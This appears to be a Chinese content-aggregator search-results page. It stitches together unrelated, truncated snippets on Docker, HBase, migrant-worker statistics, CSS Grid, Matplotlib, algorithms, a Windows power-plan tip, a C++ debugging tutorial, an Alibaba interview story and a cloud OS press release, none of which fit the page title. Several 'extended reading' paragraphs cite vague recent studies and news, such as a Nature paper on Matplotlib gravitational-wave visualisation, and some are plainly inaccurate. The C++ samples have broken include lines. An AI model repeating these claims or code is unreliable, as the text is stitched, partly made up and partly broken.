[成功复制性在教育和职业发展中的应用]的搜索结果

随着云计算技术的迅速发展，Docker逐渐成为一种比较普遍的容器化技术。Docker可以轻易地将应用程序及其依赖库封装在一起，形成一个自包含的容器。这种容器化的方式使得开发人员可以更加便捷部署和迁移应用，也让运维工程师更加方便地管理应用程序的运行环境。 除此之外，Docker的机动性也为企业赋予了许多的商业机遇。通过Docker容器化技术，企业可以非常方便地进行业务流程重组，并通过Docker容器的快速迁移，实现资源租赁、跨平台协作等业务场景。这种方式在当下的互联网+时代具有非常广泛的应用前景。 FROM nginx:alpine COPY dist/ /usr/share/nginx/html/ EXPOSE 80 CMD ["nginx", "-g", "daemon off;"] 这段代码是Dockerfile文件中的一个示例。该文件用于创建一个具有Web功能的Docker容器镜像，其以Nginx为基础镜像，将封装好的Web前端代码复制到容器中，并将容器的80端口暴露给外部服务。这样，开发人员可以非常方便地将自己的Web应用封装到Docker容器中，并在需要的时候进行部署。 不过，Docker改造也不是一件轻松的事情。在进行Docker改造时，需要开发人员具备一定的Linux基础知识和Docker技术知识。同时，在容器化过程中，也需要遵循一定的规范和标准，以避免功能冲突和安全问题。 总之，Docker的出现为企业带来了深远的影响。通过Docker容器化技术，企业可以更加便捷地进行应用程序的封装、部署和移植，也可以更加灵活地管理自己的业务流程。在未来的发展中，Docker将会成为更多企业和开发者必备的技术。

...据库系统的基础知识与应用场景后，我们发现其在大数据处理领域的价值日益凸显。近期，Apache HBase社区发布了最新版本的重大更新，引入了多项性能优化和新功能特性，例如增强的读写操作并发控制、改进的内存管理机制以及对云原生部署的更好支持，这些都进一步提升了HBase在实时分析、大规模数据存储及快速检索等方面的表现。 同时，随着5G、物联网(IoT)等技术的发展，产生的数据量呈现出指数级增长态势，对于高效、灵活且可扩展的数据处理解决方案的需求愈发强烈。近日，《InfoWorld》的一篇深度报道指出，多个国际知名互联网企业已将HBase作为其核心数据平台的重要组成部分，成功支撑起每日数十亿级别的数据访问请求，充分验证了HBase在应对超大规模数据挑战时的卓越能力。 此外，针对HBase的学习资源也在不断丰富和完善中。Apache软件基金会联合多家教育机构共同推出了线上课程和实战培训项目，旨在帮助开发者深入理解HBase的架构原理，并掌握如何在实际业务场景中有效运用。未来，HBase将持续引领NoSQL数据库技术潮流，为全球企业和开发者提供更加先进、可靠的大数据处理工具。

...民工群体的最新动态和发展趋势。近期，国家统计局发布了《2021年农民工监测调查报告》，数据显示全国农民工总量达2.92亿人，其中外出农民工达到1.71亿人，新生代农民工占比持续增长，已占全部农民工的50.5%，凸显了新生代农民工在我国经济社会发展中的重要作用。 随着我国产业结构调整和数字化转型加速，农民工就业领域正在发生深刻变化。越来越多的新生代农民工开始涉足信息传输、软件和信息技术服务业等新兴产业，他们在提升自身技能、融入城市生活的同时，也面临诸如职业培训不足、社会保障不完善等问题。政府相关部门正积极采取措施，加大职业技能培训力度，推进农民工市民化进程，并通过立法手段保障农民工权益，如推动实施“新市民”政策，以期实现农民工与城市的深度融合。 此外，针对新生代农民工的生活状况，《中国青年农民工社会融入研究报告》指出，尽管收入水平有所提高，但他们在住房、子女教育、医疗等方面依然面临较大压力，对此，各地政府也在探索实施租赁住房补贴、随迁子女平等接受义务教育、建立覆盖农民工的社会保险体系等一系列改革措施，力求解决新生代农民工在城市化进程中的痛点难点问题。 综上所述，新生代农民工已成为我国经济社会发展中不可或缺的力量，其市民化过程不仅关乎个人命运变迁，更影响着新型城镇化乃至整个国家的发展走向。社会各界应密切关注这一群体的需求变化，提供更加全面的支持和服务，共同助力新生代农民工顺利融入城市，共享社会发展成果。

...CSS布局技术的不断发展中，Flexbox已经成为现代网页设计中实现复杂布局的强大工具，特别是对于横向布局块级元素。然而，随着响应式设计需求的增长，CSS Grid布局逐渐崭露头角，为开发者提供了更为精细和灵活的二维网格系统。 近期，W3C正式推荐了CSS Grid布局作为主流布局模式，许多知名网站已开始采用这一技术进行重构和优化。例如，《纽约时报》在其新版网页设计中就运用了CSS Grid，成功实现了多列、自适应以及复杂区域划分的布局效果，大大提升了用户体验。 深入解读CSS Grid布局，其核心在于“网格容器”（grid container）与“网格项”（grid items）的概念。通过定义grid-template-columns和grid-template-rows属性，可以精确地控制每个网格区域的大小；而justify-items与align-items等属性则能细致调整每个网格项的位置和对齐方式。 不仅如此，CSS Grid还支持自动布局（auto-fit和auto-fill关键字）、重复轨道（repeat()函数）、以及跨越多行或多列（grid-column和grid-row属性），这使得在不牺牲灵活性的前提下，能够轻松应对不同屏幕尺寸和设备类型的需求。 因此，对于想要深入了解和掌握现代网页布局技术的开发者而言，在熟练使用Flexbox的基础上，进一步学习和研究CSS Grid布局无疑将极大地提升工作效率和设计自由度，紧跟Web开发领域的最新趋势。

...前科研和工业界的前沿应用。例如，近期Nature杂志的一项研究中，科学家们利用Python的Matplotlib和Seaborn库成功实现了复杂物理模型的动态可视化，生动展示了黑洞合并过程中的引力波变化特性，这一突破性成果极大地推动了天文学研究的发展。 此外，随着大数据时代的到来，数据可视化在教育领域的革新同样值得关注。例如，许多在线教育平台开始整合编程与数学教学，让学生通过编写Python代码并调用Matplotlib实时绘制函数图像，使抽象的数学概念具象化，从而提高学生对函数性质、微积分等核心知识点的理解能力。同时，这种实践性的教学方法也契合了STEM教育注重培养跨学科素养和动手实践能力的趋势。 不仅如此，在商业智能分析领域，Matplotlib与其他数据分析库如Pandas和Scikit-learn结合使用，能够帮助企业决策者快速洞察复杂数据背后的规律，直观展示销售趋势、用户行为特征等关键信息，为精准营销和战略规划提供有力支持。 综上所述，掌握Python和Matplotlib进行函数图像绘制不仅有助于数学理论的学习，更是在科学研究、教育创新及商业决策等多个领域展现出了广泛而深远的应用价值。未来，随着技术的不断迭代升级，我们有理由相信，Python的数据可视化功能将在更多场景中发挥更大的作用。

...输及微信表单源码中的应用后，我们可以进一步探索这一技术在现代数字化生活中的实际影响和最新发展动态。 近日，腾讯微信团队公开表示正在优化其小程序平台的数据交互机制，计划通过强化对Json格式的支持，以实现更高效、灵活的数据处理能力。这意味着未来开发者在构建微信小程序时，能够更加便捷地利用Json来设计复杂多样的动态表单，实时收集并处理用户信息，有效提升用户体验与数据流转效率。 此外，随着JSON-LD（JSON for Linking Data）标准的推广，Json不仅局限于简单的数据交换，也开始在语义网络和知识图谱领域发挥作用。例如，在教育行业的学生信息系统中，采用JSON-LD可以更好地结构化学生的教育经历和工作经历数据，使得这些信息能在不同系统间无缝集成和共享，为大数据分析、智能推荐等应用提供有力支持。 同时，国内外多家大型互联网企业如Google、阿里巴巴等也都在自家服务接口中广泛采纳Json作为数据交换的标准格式，不断推动Json在云计算、物联网等前沿领域的深度应用。 综上所述，Json在信息化社会中的地位日益凸显，无论是对于提升微信等社交平台的数据处理能力，还是在促进跨系统数据整合与开放互联等方面，都展现出巨大的潜力与价值。未来，随着技术的发展与应用场景的拓展，Json将在更多维度助力数字化生活的构建与升级。

...流与最小流算法的实际应用和理论研究后，我们发现这一技术在网络优化、物流调度、电力系统等领域具有广泛应用价值。最近，我国电网公司成功运用改进的网络流算法解决了一项实际难题：在满足上下限供电需求的前提下，优化了跨区域电力调配，有效提升了电网运行效率。 延伸阅读一则来自《中国电力》杂志2022年最新报道，文章详细阐述了研究人员如何将有源汇上下界最大流模型应用于复杂电网场景中，通过Dinic算法的高效实现，实现了对输电线路容量限制以及各节点供电量约束条件下的最优电力分配方案。此外，报道还揭示了该算法在处理大规模数据和实时调度方面的优势，并进一步探讨了其在智能电网未来发展中的潜在作用。 另一方面，国际知名学术期刊《ACM Transactions on Algorithms》近期发布了一篇深度解读论文，作者深入剖析了有源汇上下界最大流问题的理论基础，并在此基础上提出了一种新的求解框架，不仅提高了原有Dinic算法的性能，还在特定条件下解决了最小流问题。这项研究为未来更复杂网络流问题的求解提供了新的理论工具和方法论指导，对于推动相关领域的发展具有深远意义。 总之，无论是从最新的科研进展还是现实世界的工程应用层面，有源汇上下界最大流与最小流算法都在持续展现出其强大的实用性与创新性，为我们理解和解决各类资源优化配置问题提供了强有力的数学工具和解决方案。

在搜索引擎技术的快速发展中，Elasticsearch因其分布式架构和对大数据实时处理的优势，已在众多领域展现出强大的搜索与分析能力。近期，Elasticsearch针对邻近关键字匹配功能的应用场景愈发广泛，尤其在电商、新闻聚合、社交媒体等需要精确捕捉用户意图的行业中备受瞩目。 例如，在2021年某大型电商平台升级其搜索引擎时，就深度运用了Elasticsearch的邻近关键字匹配功能，显著提升了商品搜索结果的相关性和用户体验。通过对海量商品信息进行高效索引，并精准匹配用户输入的连贯性短语，该平台有效解决了用户搜索需求与实际展示结果之间可能存在的语义鸿沟。 此外，随着Elasticsearch 7.x版本的更新迭代，其邻近关键字匹配算法在性能优化上取得重大突破。借助更灵活的分词策略以及更高效的查询执行计划，使得即使面对大规模数据集，也能在保证高精度的同时大大缩短响应时间。 深入理解并合理应用Elasticsearch的邻近关键字匹配技术，不仅有助于企业提升服务质量和客户满意度，也为未来构建智能化、个性化的搜索推荐系统提供了坚实的技术支撑。在大数据时代，掌握这一关键技术，无疑将为企业带来更大的竞争优势和发展潜力。

...能在复杂问题解决中的应用的关注。近日，随着区块链技术的发展与普及，数据加密的重要性日益凸显，类似密文与key值关系的安全算法在数字货币交易、智能合约执行等场景中发挥着关键作用。 据《Nature》杂志近期报道，科研团队成功研发了一种新型高效的大整数乘积取模加密算法，该算法能够有效提高数据安全性，并降低计算资源消耗，这无疑为现实版“菲莉丝”们提供了更强大的工具去解码那些看似无解的信息迷宫。同时，这也启示我们在设计虚拟空间或构建数字乌托邦时，必须高度重视信息保护与隐私安全。 此外，深入解读历史记录在文化传承与社会发展中的角色亦是本文引申出的重要话题。正如稗田一族对幻想乡历史的记录对于菲莉丝至关重要，现实中，无论是档案馆保存的历史文献还是网络云端的电子资料，都承载着人类文明的记忆，其加密存储和安全访问机制的研究同样值得深入探索。 总之，《贤者之石与幻想乡的秘密》这一寓言式的编程题揭示了在科技高速发展的今天，如何借助先进算法和技术手段来保障信息安全与数据私密性的问题，而这些议题正成为全球科技界关注的焦点。

...用版本、专业版甚至是教育版等版本都不会见到。并且一定是要是17666以上版才可以！ 首先点击屏幕左下角的开始按钮（或按键盘上的Win按钮），然后直接输入“powershell”，即可看到系统自动搜索到了一个名叫“Windows Powershell”的桌面应用，然后右键点击它，选择“以管理员身份运行”。即可在管理员身份的情况下开启“Windows Powershell”程序。当然cmd也行 这时再输入命令“powercfg -duplicatescheme e9a42b02-d5df-448d-aa00-03f14749eb61”（不含引号，可以直接复制粘贴），再点击回车，就会显示“电源方案 GUID：36d0a2da-8fb0-45d8-80f3-37afb1f70c3a（卓越性能）”的提示，这样就表示已经开启“卓越性能”模式了。 此时再回到“其他电源设置”中，就可以看到在选项中多了一个“卓越性能”模式了。 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_44368963/article/details/132310845。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...包邮？”的最优化策略应用，都体现了算法与实际生活场景紧密结合的特点。为了进一步了解动态规划和背包问题在现代生活及科技领域的广泛应用，延伸阅读可以关注以下内容： 近日，《Nature》杂志发表的一篇研究论文中提到，科研人员利用动态规划算法优化了大规模疫苗分配问题，在有限的疫苗供应下，成功制定了最有效的分发策略，确保了全球各地尤其是发展中国家能够及时获得足够剂量的疫苗。 同时，在电子商务领域，亚马逊、京东等大型电商平台也常采用类似01背包问题的优化模型，根据用户购物车中的商品价格以及优惠活动规则，实时计算出最优的满减或包邮方案，既提升了用户体验，又实现了销售利润的最大化。 此外，深入学习计算机科学经典教材《算法导论》中关于背包问题和动态规划章节，可以帮助读者系统地理解这些问题背后的理论基础，并掌握如何将这些理论应用于解决各类复杂决策问题。 综上所述，通过关注时事新闻中有关动态规划的实际应用案例，以及研读专业教材深化对算法原理的理解，我们可以更好地将所学知识转化为解决实际问题的能力，紧跟时代步伐，应对日益复杂的现实挑战。

...索云端化服务器管理的发展趋势与实践案例。近日，阿里云、腾讯云等大型云服务提供商均在积极布局云端运维解决方案，其中，阿里云推出的“云助手”可实现对云上资源的集中、远程、可视化的高效运维，充分体现了无需安装、即开即用的云端化优势。 同时，随着DevOps理念的普及，自动化运维工具链如Ansible、Terraform等也逐渐成为云端运维的重要组成部分，它们能够帮助企业和个人用户简化部署流程，提升运维效率，降低出错概率。例如，通过Terraform可以以声明式的方式编写基础设施配置，并在云端统一管理和更新。 另外，关于旗鱼云梯所引领的轻量化、低成本云端服务器管理模式，其背后是SaaS（Software as a Service）模式的成功应用。这种模式不仅改变了传统运维方式，也为中小微企业提供了更为经济高效的运维方案，降低了IT运维的技术门槛和成本压力。 值得一提的是，在未来发展中，随着容器技术（Docker、Kubernetes）以及无服务器架构(Serverless)的广泛应用，云端运维将更加便捷灵活，用户无需关心底层服务器细节，只需关注业务逻辑本身，这将进一步推动Linux面板向更高层次的云端化、智能化发展。 综上所述，无论是大型云服务商的运维产品升级，还是新兴运维工具及SaaS模式的应用，都揭示了云端化服务器管理正逐步成为行业发展的必然趋势，为用户提供更安全、便捷、高效的运维环境。

...并助力广大求职者提升职业技能。例如，阿里云就在其官网推出了Python开发者培训课程，旨在通过系统化教学帮助学员掌握从基础语法到实战项目的全套技能。 此外，教育部门和学术界也愈发重视Python编程教育的普及，部分国家和地区已将Python纳入了中小学计算机课程体系中，以期培养未来数字化时代的创新人才。 值得注意的是，虽然Python入门门槛相对较低，但深入理解和应用仍需系统化的训练及大量的实践操作。自学虽可节省经济成本，但在时间管理、知识梳理及项目实操等方面可能面临挑战。因此，选择适合自己的学习路径至关重要，可以结合自身情况考虑是否参加培训班，或者利用丰富的在线教育资源进行自我提升。 同时，随着新兴技术的快速发展，学习Python不仅仅是为了应对眼前的就业竞争，更是为了构建个人在未来智能社会中的核心竞争力。无论选择何种方式学习，持之以恒的学习态度与勇于实践的精神都是成功的关键。对于有志于从事相关行业或提升自我的人士来说，把握住Python这一风口，无疑是在为自己的职业生涯增添重要砝码。

...，就是它！这就说明你成功地设了个断点，可以慢慢享受代码跳动的乐趣啦。 现在，启动调试器，程序将在断点处暂停。通过单步执行功能，你可以逐行检查代码的执行情况。在 if 语句执行前暂停，你可以观察到变量 x 的值为 5，从而理解程序的执行逻辑。 第四部分：利用条件断点进行深入分析 假设你怀疑某个条件分支的执行路径存在问题。可以设置条件断点，仅在特定条件下触发： cpp include int main() { int x = 5; if (x > 10) { std::cout << "x is greater than 10" << std::endl; } else { std::cout << "x is not greater than 10" << std::endl; } return 0; } 设置条件断点时，在断点上右击选择“设置条件”，输入 x > 10。现在，程序只有在 x 大于 10 时才会到达这个断点。 第五部分：调试多线程程序 对于 C++ 中的多线程应用，调试变得更加复杂。GDB 提供了 thread 命令来管理线程： cpp include include void thread_function() { std::cout << "Thread executing" << std::endl; } int main() { std::thread t(thread_function); t.join(); return 0; } 在调试时，你可以使用 thread 命令查看当前活跃的线程，或者使用 bt（backtrace）命令获取调用堆栈信息。 第六部分：调试异常处理 C++ 异常处理是调试的重点之一。通过设置断点在 try 块的开始，你可以检查异常是否被正确捕获，并分析异常信息。 cpp include include void throw_exception() { throw std::runtime_error("An error occurred"); } int main() { try { throw_exception(); } catch (const std::exception& e) { std::cerr << "Caught exception: " << e.what() << std::endl; } return 0; } 结语 调试是编程旅程中不可或缺的部分，它不仅帮助我们发现并解决问题，还促进了对代码更深入的理解。随着经验的积累，你将能够更高效地使用调试器，解决更复杂的程序问题。嘿，兄弟！记住啊，每次你去调试程序的时候，那都是你提升技能、长见识的绝佳时机。别怕犯错，知道为啥吗？因为每次你摔个大跟头，其实就是在为成功铺路呢！所以啊，大胆地去试错吧，失败了就当是交学费了，下回就能做得更好！加油，程序员！

在移动互联网技术飞速发展的今天，Android开发领域的热度持续不减。除了上述提供的丰富教程和源码资源外，近期还有一些值得关注的动态和技术进展。 首先，在开源社区中，Google推出了Android 12开发者预览版，带来了全新的设计语言Material You，以及对隐私保护功能的重大升级，允许用户更精确地控制应用对个人信息的访问权限。对于热衷于学习前沿技术和紧跟行业趋势的开发者来说，深入研究Android 12的新特性无疑具有极高的价值。 其次，随着5G网络在全球范围内的普及，实时视频传输技术在Android开发中的应用越来越广泛。例如，有开发者团队利用WebRTC等开源框架成功实现了高清流畅的移动端实时音视频通信功能，并在教育、医疗、游戏等多个场景落地。这为Android开发者提供了广阔的应用创新空间。 此外，针对Android生态的安全问题，谷歌安全团队近日发布了一份年度报告，揭示了过去一年发现并修复的主要安全漏洞，同时分享了提升Android应用安全性的最佳实践与建议。这对于从事Android安全卫士研发及关注应用安全性的开发者而言，是一份极具时效性和指导意义的参考资料。 最后，随着跨平台开发工具如Flutter和React Native的兴起，越来越多的开发者开始探索如何将这些框架与Android原生开发相结合，以提高开发效率并实现更好的用户体验。这也为Android开发者带来了新的挑战与机遇，值得进一步研读和探讨相关案例与教程。 总之，在瞬息万变的科技领域，Android开发者不仅要掌握基础技能，更要关注行业的最新动态和发展趋势，才能在竞争激烈的市场环境中保持竞争力。通过不断学习与实践，结合最新的Android开发工具与技术，开发者们可以创造出更多满足市场需求、引领时代潮流的应用产品。

...注如何将这一原则有效应用到个人成长、团队协作和企业培训实践中。近期，《哈佛商业评论》发表了一篇题为《实践的力量：重新审视学习与发展的70/20/10框架》的文章，文中引用了众多跨国公司的人力资源发展案例，对721法则进行了深度解读。作者强调，在数字化时代，虽然在线教育和远程学习方式的兴起让“10%的培训与学习”部分变得更加便捷，但实践经验（70%）和人际互动交流（20%）的价值并未因此减弱，反而更加凸显其不可替代性。 同时，一项由LinkedIn Learning于今年发布的《职场技能报告》显示，全球范围内，超过80%的企业领导者认为，员工通过实际项目锻炼和跨部门合作获得的能力提升最为显著，这恰好印证了721法则中关于实践重要性的理念。此外，该报告还倡导企业在构建内部培训体系时，应重视搭建分享交流平台，鼓励知识和经验的流动，以实现20%交流反馈环节的高效运作。 值得一提的是，不少科技巨头如Google和Microsoft已开始推行“ Growth Mindset（成长型思维模式）”的文化建设，提倡员工勇于尝试、敢于失败，这无疑是对721法则中实践精神的有力践行。在这样的企业文化氛围下，员工不仅能从错误中汲取宝贵经验，而且能够在团队协作中不断提升自身能力，从而形成良性循环，推动企业和个人共同发展。 总结来说，721法则不仅是一种理论指导，更应在现实工作场景中灵活运用。无论是组织架构设计，还是个人职业规划，都应充分认识到实践、交流和学习三者相辅相成的重要性，以适应不断变化的工作环境和挑战。

...算和微服务架构的快速发展，容器化技术已经成为软件开发和运维领域不可或缺的一部分。Docker作为这一领域的领头羊，其影响力不断扩大，尤其是在Node.js社区中，越来越多的开发者开始采用Docker来简化开发、测试和部署流程。近期，一项关于全球开发者技术趋势的调查显示，超过60%的受访者表示他们在过去一年中使用过Docker进行项目管理，其中Node.js开发者占比尤为突出。这种趋势表明，容器化技术正在深刻改变软件开发的方式。 与此同时，Docker公司最近宣布了一项新的开源计划，旨在推动容器技术的标准化和安全性。这一计划名为“Open Container Initiative”（OCI），旨在制定一套通用的标准，使得不同厂商的容器技术能够更好地协同工作。这对于Node.js开发者而言是一个重要的利好消息，因为这意味着未来的Docker镜像将更加兼容，开发者可以更轻松地在不同平台上迁移和共享他们的应用。 此外，随着Kubernetes的兴起，容器编排工具逐渐成为主流。Kubernetes不仅支持Docker容器，还提供了强大的自动化管理能力，使得大规模部署Node.js应用变得更加高效。例如，某知名电商公司在去年成功将其电商平台迁移到基于Kubernetes的Docker容器集群上，不仅提升了系统的稳定性和扩展性，还显著降低了运维成本。 从长远来看，容器化技术将继续推动DevOps文化的普及，促进开发人员和运维团队之间的协作。正如Linux之父Linus Torvalds所说：“开源的本质在于合作而非竞争。”通过拥抱开源技术和社区的力量，开发者可以更快地创新并解决实际问题。对于Node.js开发者而言，掌握Docker和Kubernetes等工具，不仅是技术上的提升，更是职业发展的必要条件。在未来几年，我们有理由相信，容器化技术将在更多领域展现出其独特的价值，为软件行业带来更多的可能性。

...，经历5轮面试，一举成功拿下offer并定级P6。 小天趁着未来的阿里大佬还在身边，向程序员H讨教了一下面试阿里菜鸟的经验，于是有了下面的情景： 小天把程序员H叫到了公司外面的阳台上，伸手递了一根相思鸟。 小天(小声地)：大佬，你那边准备什么时候入职哇？ 程序员H：唉~不知道呀，我想尽早过去，但是这边离职流程走下来至少也得一个月，难搞哦！ 小天：确实，以大佬你的能力，在这里一个月才拿8.5k实在是有点屈才了... 程序员H：嘘~小声点，公司不让谈论薪资的，你还想不想混了。我之前是跟老板提了三次涨薪，可老板一推再推，说是我以后在公司的前途无可限量，不要总是局限于眼前的这点工资 说完，程序员H望着远方，吐了一个烟圈，随着烟圈的远去，变得越来越大。 程序员H(指着烟圈)：老板给我画的饼呐，就是这个烟圈里看到的世界，大得很...对了，咱两差不多大，我看，你也尽快跳了吧！ 小天：嘿嘿，有想过，但是能力不够，跳不得跳不得... 程序员H：啥跳不得啊？多看点技术书籍就差不多了 小天：唉~就是不喜欢看书，对了，大佬，你这次去面试问了些什么啊？很好奇阿里是怎么面试的，有哪些环节？ 程序员H(突然振作精神)：我跟你讲啊，不得不说，这大公司到底是大公司，规范得很。我面试的时候加HR面，一共有5轮，大概回忆一下... 一面 (电话面试) 介绍自己比较熟悉的项目和项目中遇到的难点 Springbean生命周期 谈谈依赖注入和面向切面 HashMap原理和扩容机制 常用并发包下的类 Redis持久化方式，为什么这么快？ 自己平时如何提升的，看书或者网站？ 二面 Jvm类加载机制，分别每一步做了什么工作？ Jvm内存模型，垃圾回收机制，如何确定被清除的对象？ 了解哪些垃圾回收器和区别？ 多线程相关，线程池的参数列表和拒绝策略 Jvm如何分析出哪个对象上锁？ Mysql索引类型和区别，事务的隔离级别和事务原理 Spring scope 和设计模式 Sql优化 三面 fullgc的时候会导致接口的响应速度特别慢，该如何排查和解决？ 项目内存或者CPU占用率过高如何排查？ ConcurrentHashmap原理 数据库分库分表 MQ相关，为什么kafka这么快，什么是零拷贝？ 小算法题 http和https协议区别，具体原理 四面(Leader) 手画自己项目的架构图，并且针对架构和中间件提问 印象最深的一本技术书籍是什么？ 五面(HR) 没什么过多的问题，主要就是聊了一下自己今后的职业规划，告知了薪资组成体系等等。 插播一条福利！！！最近整理了一套1000道面试题的文档(详细内容见文首推荐文章)，以及大厂面试真题，和最近看的几本书。 需要刷题和跳槽的朋友，这些可以免费赠送给大家，帮忙转发文章，宣传一下，后台私信【面试】免费领取！ 小天：好像问了两次看书的情况诶？现在面试还问这个？ 程序员H：是啊，幸亏之前为了弄懂JVM还看了两本书，不然真不知道说啥了！ 小天：看来，我也要找几本书去看了，感情没看过两本书都不敢跳槽了！ 程序员H：对了，还有简历，告诉你一个捷径 简历尽量写好一些，项目经验突出： 1、自己的知识广度和深度 2、自身的优势 3、项目的复杂性和难度以及指标 4、自己对于项目做的贡献或者优化 程序员H：唉~这还不能走可怎么办呀！你说，我把主管打一顿，是不是马上就可以走了？ 小天：... 查看全文 http://www.taodudu.cc/news/show-3387369.html 相关文章： 阿里菜鸟面经 Java后端开发 社招三年 已拿offer 阿里 菜鸟网络(一面) 2021年阿里菜鸟网络春招实习岗面试分享，简历+面试+面经全套资料！ 阿里菜鸟国际Java研发面经(三面+总结):JVM+架构+MySQL+Redis等 2021年3月29日 阿里菜鸟实习面试（一面）（含部分总结） mongodb 子文档排序_猫鼬101：基础知识，子文档和人口简介 特征工程 计算方法Gauss-Jordan消去法求线性方程组的解 使用(VAE)生成建模,理解可变自动编码器背后的数学原理 视觉SLAM入门 -- 学习笔记 - Part2 带你入门nodejs第一天——node基础语法及使用 python3数据结构_Python3-数据结构 debezium-connect-oracle使用 相关数值分析多种算法代码 android iphone treeview,Android之IphoneTreeView带组指示器的ExpandableListView效果 nginx rewrite功能使用 3-3 OneHot编码 JavaWeb：shiro入门小案例 MySQL的定义、操作、控制、查询语言的用法 MongoDB入门学习(三)：MongoDB的增删查改 赋值、浅复制和深复制解析 以及get/set应用 他是吴恩达导师，被马云聘为「达摩院」首座 Jordan 标准型定理 列主元的Gauss-Jordan消元法-python实现 Jordan 块的几何 若尔当型（The Jordan form） 第七章 其他神经网络类型 解决迁移系统后无法配置启用WindowsRE环境的问题 宝塔面板迁移系统盘/www到数据盘/home 使用vmware vconverter从物理机迁移系统到虚拟机P2V 本篇文章为转载内容。原文链接：https://blog.csdn.net/m0_62695120/article/details/124510157。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...allen关于其十年职业生涯的深度回顾后，我们不难发现技术人才在职场发展中选择赛道、保持主动性和深度思考的重要性。近年来，随着互联网行业的快速发展与变革，类似的职业路径选择与个人成长故事愈发常见。 当前，互联网行业正面临新一轮的转型升级，从人工智能、云计算到大数据分析，新兴技术领域的崛起为技术人员提供了更为广阔的发展舞台。例如，在字节跳动等头部互联网企业中，技术研发人员不仅能够参与到创新项目中，还可能获得丰厚的股权激励，实现个人财富和职业价值的双重提升（参考《字节跳动员工持股计划：释放的价值与激励机制解读》）。 此外，对于技术人员而言，持续学习与技术积累显得尤为关键。近日，《中国程序员技术能力现状与发展趋势报告》指出，随着容器化、微服务架构的广泛应用，以及Docker、Kubernetes等技术的普及，对底层网络工作原理的理解和应用能力成为衡量开发人员技术水平的重要标准之一。 同时，团队协作与领导力培养也日益受到重视。据《哈佛商业评论》近期文章所述，在现代企业中，具有主动发现问题、解决问题意识，并能带领团队共同创新的技术管理者，往往能在组织内部获得更快的成长和更高的认可度。 综上所述，无论是在选择行业赛道还是在实际工作中，技术人才都应紧跟时代潮流，深化专业技能，积极主动地挖掘潜在问题并寻求解决方案，从而在快速变化的互联网行业中取得长足发展。而类似于张彦飞allen这样的经历分享，无疑为后来者提供了宝贵的经验借鉴和启示。

...21日，阿波罗11号成功登陆月球表面，美国宇航员阿姆斯特朗扶着登月舱的阶梯踏上了月球，并说道：“这是我个人的一小步，但却是全人类的一大步。”此次成功登月，也实现了全人类数千年来盼望登上月球的梦想。 历史总是惊人的相似。随着全面云化时代的来临，企业级客户应用部署的范围也从传统数据中心扩展至公有云、私有云乃至混合云模式，其应用服务的复杂性和多样性随之快速上升，由此也带来了一系列巨大的挑战。所以，如何让上云更简单、更高效、更安全，更贴近业务，成为业界共同思考和关注的话题。 在此背景下，今年8月8日，华云数据正式发布了国产通用型云操作系统安超OS，这是一款具有应用创新特性的轻量级云创新平台，拥有全栈、安全、创新、无厂商锁定的特性，能够真正让政府和企业客户通过简单便捷的操作实现云部署和数字化转型。 更为关键的是，安超OS还是构建于生态开放基础之上的云操作系统，这让更多的合作伙伴也能借助这一创新的平台，和华云数据一起赋能数字中国，共同走向成功。因此，国产通用型云操作系统安超OS的发布，对于中国政府和企业更好的实现上云、应用云、管理云、优化云，无疑具有十分重要的价值和意义。 从这个角度来说，安超OS的“一小步”，也正是中国云的“一大步”。 安超OS应运而生背后 众所周知，随着数据量的不断增长和对IT系统安全性、可控性要求的不断提升，越来越多的企业发现无法通过单一的公有云或者私有云服务，满足其所有的工作负载和业务创新需求，特别是在中国这种情况更加的明显。 华云数据集团董事长、总裁许广彬 一方面，目前中国企业现有的IT基础设施架构，让他们很难“一步上公有云”，这也决定了私有云仍然会成为众多政府和企业在未来相当长一段时间采用云服务的主流模式。 来自IDC的数据从一个侧面也证实了这一现状，数据显示仅2018年中国的私有云IT基础设施架构市场的相关支出就增长了49.2%，同时过去6年中国在这方面支出的增长速度更是远高于全球市场，预测2023年中国将成为全球最大的私有云IT基础架构市场。 另一方面，无论是传统的私有云还是公有云厂商的专有云，同样也很难满足中国企业的具体需求。比如，传统私有云的定制化尽管满足了行业企业客户复杂的IT环境和利旧的需求，但存在碎片化、不可进化的问题，也无法达到公有云启用便捷、功能不断进化、统一运维、按需付费的消费级体验，成为传统私有云规模化增长的掣肘。 当然，过去几年国内外公有云巨头也纷纷推出面向私有云市场的专有云产品，但其设计思路是以公有云为核心，其价值更多在于公有云服务在防火墙内的延伸，其初衷是“将数据迁移到中心云上”，这同样不适合，更难以匹配中国企业希望“将云移动到数据上”的最终目标。 正是源于这些客户“痛点”和市场现状，让华云数据产生了打造一款通用型云操作系统的想法。今年3月1日，华云数据宣布对超融合软件厂商Maxta全部资产完成了合法合规收购。至此，华云数据将独家拥有Maxta的包括产品技术、专利软著、品牌、市场在内的全球范围的资产所有权。 在此基础上，华云数据又把Maxta与华云自身的优势产品相融合，正式推出了安超OS国产通用型云操作系统，并在国产化与通用型方向做了三个方面的重要演进： 首先，兼容国产服务器、CPU、操作系统。安超OS对代码进行了全新的架构扩展，创建并维护新的一套代码分支，从源码级完成众多底层的对国产服务器、CPU、操作系统的支持。 其次，扩展通用型云操作系统的易用性。安超OS以VM为核心做为管理理念，以业务应用的视觉管理基础设施，为云操作系统开发了生命周期管理系统（LCM），提供像服务器操作系统的光盘ISO安装方式，可以30分钟完成云操作系统的搭建，并具备一键集群启停、一键日志收集、一键运维巡检业务等通用型云操作系统所必备的易用性功能。 最后，增强国内行业、企业所需的安全性。安超OS的所有源代码都通过了相关部门的安全检查，确保没有“后门”等漏洞，杜绝安全隐患，并且通过了由中国数据中心联盟、云计算开源产业联盟组织，中国信息通信研究院（工信部电信研究院）测试评估的可信云认证。 不难看出，安超OS不仅具有全球领先的技术，同时又充分满足中国市场和中国客户的需求。正如华云数据集团董事长、总裁许广彬所言：“唯改革者进，唯创新者强，华云数据愿意用全球视野推动中国云计算发展，用云创新驱动数字经济挺进新纵深，植根中国，奉献中国，引领中国，腾飞中国。” 